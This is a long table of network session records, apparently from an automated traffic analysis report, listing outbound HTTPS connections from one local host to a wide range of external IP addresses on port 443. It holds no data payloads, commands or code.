                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18079192.168.2.1451562101.72.14.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18080192.168.2.1449022190.34.106.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18081192.168.2.145948265.115.93.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18082192.168.2.145333058.117.247.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18083192.168.2.1437778155.216.99.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18084192.168.2.144273249.116.213.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18085192.168.2.1451640150.30.6.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18086192.168.2.1443740170.6.113.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18087192.168.2.1444132200.9.169.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18088192.168.2.1445950130.125.56.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18089192.168.2.143653070.28.130.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18090192.168.2.145771446.125.99.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18091192.168.2.1452570156.9.162.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18092192.168.2.145853657.243.153.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18093192.168.2.1434936217.130.40.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18094192.168.2.1459172130.196.42.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18095192.168.2.1455994187.5.50.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18096192.168.2.1436408133.51.43.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18097192.168.2.1458958118.153.137.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18098192.168.2.1454150110.106.30.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18099192.168.2.1433396212.50.130.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18100192.168.2.1446924221.250.74.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18101192.168.2.144185252.125.169.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18102192.168.2.1447842133.252.97.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18103192.168.2.144265095.240.42.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18104192.168.2.144390890.161.73.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18105192.168.2.1448426110.43.56.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18106192.168.2.144005462.92.94.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18107192.168.2.146070257.38.181.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18108192.168.2.1445460191.158.210.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18109192.168.2.1442030196.189.8.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18110192.168.2.145574457.191.97.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18111192.168.2.145745696.14.89.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18112192.168.2.1441894179.206.172.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18113192.168.2.1452238144.40.150.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18114192.168.2.1452086120.88.33.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18115192.168.2.1446544121.242.15.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18116192.168.2.1439590110.245.140.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18117192.168.2.1458102181.147.66.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18118192.168.2.1449626222.186.125.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18119192.168.2.1449618206.199.56.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18120192.168.2.1458766182.103.42.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18121192.168.2.145512473.141.58.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18122192.168.2.145001868.22.15.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18123192.168.2.1450530207.18.220.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18124192.168.2.1432932141.215.47.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18125192.168.2.1458034192.239.176.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18126192.168.2.1452676163.13.243.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18127192.168.2.144211482.237.137.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18128192.168.2.144907237.46.205.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18129192.168.2.1435982149.198.43.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18130192.168.2.1433394107.147.193.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18131192.168.2.1445244217.149.244.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18132192.168.2.14492301.139.10.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18133192.168.2.1438546204.47.36.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18134192.168.2.14538924.38.250.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18135192.168.2.1435420211.34.118.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18136192.168.2.1436088164.251.43.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18137192.168.2.1443620155.86.149.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18138192.168.2.1432868189.173.11.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18139192.168.2.144296466.17.113.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18140192.168.2.144980842.152.171.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18141192.168.2.1448324211.61.6.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18142192.168.2.1435164203.199.195.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18143192.168.2.1456214134.32.69.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18144192.168.2.1440344181.111.187.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18145192.168.2.1459232122.227.53.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18146192.168.2.1453354113.102.60.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18147192.168.2.144944097.180.125.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18148192.168.2.1451596187.20.135.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18149192.168.2.1437708163.55.190.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18150192.168.2.1451582206.255.5.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18151192.168.2.1459006187.51.227.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18152192.168.2.145723650.119.121.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18153192.168.2.1440574217.152.108.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18154192.168.2.14534941.33.2.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18155192.168.2.1445434139.142.29.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18156192.168.2.143605895.216.48.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18157192.168.2.144268213.197.41.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18158192.168.2.1448006131.79.71.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18159192.168.2.145518059.147.16.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18160192.168.2.1460506208.19.207.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18161192.168.2.1432944167.160.62.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18162192.168.2.1448258100.208.89.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18163192.168.2.1442504222.108.128.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18164192.168.2.1449538145.118.70.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18165192.168.2.144511818.49.180.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18166192.168.2.1457586123.68.8.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18167192.168.2.1444170118.122.125.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18168192.168.2.145236860.130.185.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18169192.168.2.1454570213.199.27.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18170192.168.2.1459956180.131.247.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18171192.168.2.144561870.253.7.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18172192.168.2.1458542194.64.92.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18173192.168.2.145517664.190.223.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18174192.168.2.1446476209.250.252.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18175192.168.2.1439024183.253.160.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18176192.168.2.1454296121.68.222.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18177192.168.2.145493214.30.161.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18178192.168.2.1434280177.173.250.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18179192.168.2.1433524109.38.141.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18180192.168.2.143306897.226.183.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18181192.168.2.1433126170.52.78.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18182192.168.2.1459666147.169.171.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18183192.168.2.146056058.112.121.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18184192.168.2.1458928152.118.149.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18185192.168.2.1442610154.182.244.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18186192.168.2.1459108121.100.176.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18187192.168.2.144814492.24.39.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18188192.168.2.145786894.135.255.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18189192.168.2.1437558209.33.223.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18190192.168.2.145613275.25.253.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18191192.168.2.1458908175.170.114.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18192192.168.2.1460048203.203.243.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18193192.168.2.1459242222.173.125.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18194192.168.2.1447704208.217.163.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18195192.168.2.144373099.215.26.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18196192.168.2.145577896.35.230.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18197192.168.2.1451656138.90.184.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18198192.168.2.146062286.181.17.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18199192.168.2.1445120121.29.10.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18200192.168.2.144180268.122.178.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18201192.168.2.145751225.28.58.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18202192.168.2.1441528118.168.183.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18203192.168.2.144425272.253.230.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18204192.168.2.145626034.201.228.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18205192.168.2.1455716176.68.113.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18206192.168.2.1451024117.188.19.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18207192.168.2.1436476216.197.205.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18208192.168.2.1447484152.17.124.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18209192.168.2.144127219.251.0.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18210192.168.2.1447082221.60.246.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18211192.168.2.1434752100.199.102.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18212192.168.2.1437492184.23.82.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18213192.168.2.1444688149.189.186.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18214192.168.2.1441176165.145.240.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18215192.168.2.1448024181.75.155.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18216192.168.2.146070237.24.50.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18217192.168.2.1438430171.142.221.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18218192.168.2.1440922165.87.92.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18219192.168.2.144655697.27.214.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18220192.168.2.1441590112.211.213.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18221192.168.2.1450094103.10.10.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18222192.168.2.145034657.116.13.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18223192.168.2.1440842108.129.82.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18224192.168.2.14344504.186.83.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18225192.168.2.1433290160.215.6.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18226192.168.2.1439346123.56.226.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18227192.168.2.144968053.154.135.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18228192.168.2.1439626160.85.102.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18229192.168.2.145470236.63.7.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18230192.168.2.1459764185.29.161.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18231192.168.2.143857037.31.105.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18232192.168.2.144267612.89.225.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18233192.168.2.144749637.250.218.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18234192.168.2.143401841.26.93.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18235192.168.2.143990612.208.234.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18236192.168.2.143282440.90.4.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18237192.168.2.14343669.144.128.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18238192.168.2.143283418.161.148.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18239192.168.2.144064672.137.208.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18240192.168.2.1459748133.63.124.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18241192.168.2.1455568104.167.175.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18242192.168.2.1438820169.180.88.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18243192.168.2.1436678207.64.179.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18244192.168.2.1454612128.32.140.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18245192.168.2.144639823.247.76.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18246192.168.2.1459498168.84.73.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18247192.168.2.145749041.112.229.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18248192.168.2.145056686.217.221.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18249192.168.2.1445358103.23.214.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18250192.168.2.144895285.160.6.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18251192.168.2.1444814124.5.95.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18252192.168.2.14449141.85.0.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18253192.168.2.1454422206.148.114.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18254192.168.2.143392218.108.108.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18255192.168.2.1438000198.232.82.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18256192.168.2.1456216122.143.13.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18257192.168.2.1458176210.104.69.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18258192.168.2.1440810198.89.28.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18259192.168.2.1435124164.221.171.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18260192.168.2.1434032166.254.53.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18261192.168.2.143739258.12.73.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18262192.168.2.145716436.64.161.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18263192.168.2.1441672175.231.6.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18264192.168.2.1439996116.220.82.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18265192.168.2.1452778188.149.13.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18266192.168.2.14394469.10.247.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18267192.168.2.1455938199.150.49.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18268192.168.2.1446844198.248.114.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18269192.168.2.1459480115.247.80.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18270192.168.2.1457792163.66.13.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18271192.168.2.145747286.193.87.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18272192.168.2.14509969.85.247.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18273192.168.2.1460422103.241.216.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18274192.168.2.1451702141.131.59.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18275192.168.2.145462845.51.23.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18276192.168.2.144518481.150.215.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18277192.168.2.1460678164.156.7.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18278192.168.2.144842420.12.15.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18279192.168.2.1437178206.178.101.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18280192.168.2.145094859.26.184.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18281192.168.2.1457938131.191.134.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18282192.168.2.145265472.253.188.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18283192.168.2.144928280.251.45.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18284192.168.2.1434402216.223.239.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18285192.168.2.1442820175.114.64.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18286192.168.2.1451670179.89.133.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18287192.168.2.145590034.137.253.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18288192.168.2.1451380143.40.171.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18289192.168.2.1453162193.161.106.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18290192.168.2.143523868.206.228.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18291192.168.2.1453260195.179.232.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18292192.168.2.1444716212.245.92.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18293192.168.2.1440378107.144.116.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18294192.168.2.1457652147.135.218.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18295192.168.2.145914289.177.66.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18296192.168.2.14552924.251.107.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18297192.168.2.1439988107.220.142.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18298192.168.2.1449904153.240.30.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18299192.168.2.143805418.135.119.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18300192.168.2.1453774166.236.123.55443
